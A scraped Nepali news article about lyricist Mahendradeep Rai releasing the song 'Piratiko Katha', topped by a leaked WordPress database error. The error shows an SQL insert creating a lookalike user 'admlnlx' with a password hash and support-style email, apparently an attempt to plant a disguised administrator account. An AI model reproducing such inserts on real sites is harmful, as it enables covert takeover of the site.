WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNc/dk2U752l83XFN0Sli5zlFdeho2/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 11:17:26', '', 'admlnlx', 'admlnlx')
काठमाडौं । गीतकार महेन्द्रदीप राईले आफ्नो नयाँ गीत ‘पिरतीको कथा’ बजारमा ल्याएका छन् ।
गीतकार राईले आज एक कार्यक्रमबीच “पिरतिको कथा” डिजिटल बजार महेद्र दिप राई अफिसियलबाट सार्वजनिक गरेका हुन ।
नेपाली काँग्रेसका महाधिवेशन प्रतिनिधि एवम् सोलुखुम्बुको थुलुङ दुधकोशी गाउँपालिका वडा नं. ६ का वडा अध्यक्ष समेत हुन् ।
राईको शब्द तथा लगानीमा निर्माण गरिएको गीतमा गायक कुमार प्रयास र गायिका रचना रिमालले स्वर भरेका छन् । उक्त गीतमा कुमार प्रयासकै संगीत रहेको छ ।
अनिल कोयी राईको निर्देशन तथा कोरियोग्राफर रहेको भिडियोमा दिनेश पराजुलीको छायांकन रहेको छ । म्युजिक भिडियोमा देव राई र सर्मिला मगरले फिचरिङ गरेका छन् ।
राईले भने ‘टिमले नै बेष्ट गर्ने कोशिस गरेका छौँ । मुल्यांकनको जिम्मा दर्शक स्रोताको हातमा सुम्पेको छु ।’ राईको शब्दमा यो भन्दा पहिला पनि थुप्रै लोकप्रिय गीतहरु बजारमा आईसकेका छन् ।https://youtu.be/GN6WE3i63Jo